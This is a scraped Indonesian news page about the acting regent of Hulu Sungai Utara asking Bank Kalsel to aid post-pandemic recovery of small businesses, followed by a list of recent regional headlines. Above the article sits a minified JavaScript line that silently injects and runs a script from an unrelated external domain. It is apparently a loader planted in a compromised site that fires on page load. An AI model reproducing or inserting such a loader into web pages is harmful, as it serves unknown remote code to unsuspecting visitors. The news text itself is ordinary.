(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Plt Bupati HSU Minta Bank Kalsel Dukung Pemulihan Ekonomi Pasca Pandemi


KANALKALIMANTAN.COM, AMUNTAI – Pelaksana Tugas (Plt) Bupati Hulu Sungai Utara (HSU), Husairi Abdi mengharapkan Bank Kalsel terus membantu pemulihan ekonomi di daerah, terutama pada sektor UMKM imbas pandemi Covid-19.

Hal ini diutarakan Plt Bupati Husairi Abdi saat menghadiri Bank Kalsel Shareholders Conference di Banjarmasin, Kamis (9/6/2022).

Husairi menyebut, Bank Kalsel sebagai mitra pemerintah sangat berperan dalam pembangunan daerah di Kabupaten HSU.

Sebagai salah satu alat kelengkapan otonomi daerah di bidang perbankan mempunyai tugas sebagai penggerak dan pendorong laju pembangunan di daerah, pemegang kas daerah, dan melaksanakan penyimpanan uang daerah.

 

 

 

Baca juga: Tukang Sapu Jalan Berangkat Haji, Nabung 12 Tahun Sisihkan dari Gaji

Untuk itu, Husairi meminta, agar Bank Kalsel mempersiapkan diri menghadapi era industri 4.0 dengan melakukan terobasan dan inovasi.

“Harapan kami keberadaan Bank Kalsel bisa membantu pemulihan ekonomi masyarakat, terutama pada sektor UMKM,” kata Husairi.

Gubernur Kalimantan Selatan, Sahbirin Noor sebelumnya mengatakan, langkah Bank Kalsel untuk mendukung pemulihan ekonomi Kalimantan Selatan harus didukung semua pemerintah daerah.

Ia menyambut baik dan mengapresiasi kegiatan Bank Kalsel Shareholders Conference ini dengan mengusung tema “Penajaman Bisnis Bank Kalsel Untuk Mendukung Pemulihan Ekonomi Kalimantan Selatan”.

Terutama di saat pandemi Covid-19 yang memberikan dampak pada pelemahan ekonomi daerah dan nasional saat ini, menurutnya pemulihan ekonomi menjadi tantangan tersendiri yang tengah dihadapi pemerintah.

“Bank Kalsel hendaknya meningkatkan mekanisme digitalisasi pelayanan agar semakin kuat, sehingga bisa memberikan pelayanan perbankan yang lebih maju dan prima kepada masyarakat,” ungkap Gubernur yang akrab disapa Paman Birin tersebut.

Ia berpesan kepada pemerintah kabupaten/kota sebagai salah satu pemegang saham Bank Kalsel agar mendorong dan mendukung Bank Kalsel demi kemajuan perekonomian dan pembangunan daerah.

“Bank Kalsel hendaknya bisa membantu meningkatkan kesejahteraan masyarakat, seperti program KUR untuk meningkatkan dan memperluas akses wirausaha seluruh sektor usaha produktif untuk mendorong pertumbuhan ekonomi, dan meningkatkan daya saing UMKM,” tutupnya.

Diketahui, dalam kegiatan Bank Kalsel Shareholders Conference tersebut, turut dihadiri Direktur Bank Kalsel, Hanawijaya dan kepala daerah se Kalsel. (Kanalkalimantan.com/dew)

Reporter : dew
Editor: bie


Risa

Recent Posts

Pj Bupati Erlin Hardi Hadiri Peluncuran Tahapan Pemilihan Bupati dan Wakil Bupati Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kabupaten Kapuas, Erlin Hardi menghadiri acara peluncuran tahapan… Read More

7 menit ago

Ini Penyebab Utama Crossing Drainase di Karang Anyar 1 Sering Berlubang

KANALKALIMANTAN.COM, BANJARBARU - Penyebab jalan berlubang yang kerap muncul di Jalan Karang Anyar 1 Kelurahan… Read More

3 jam ago

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

16 jam ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

17 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

18 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

19 jam ago

This website uses cookies.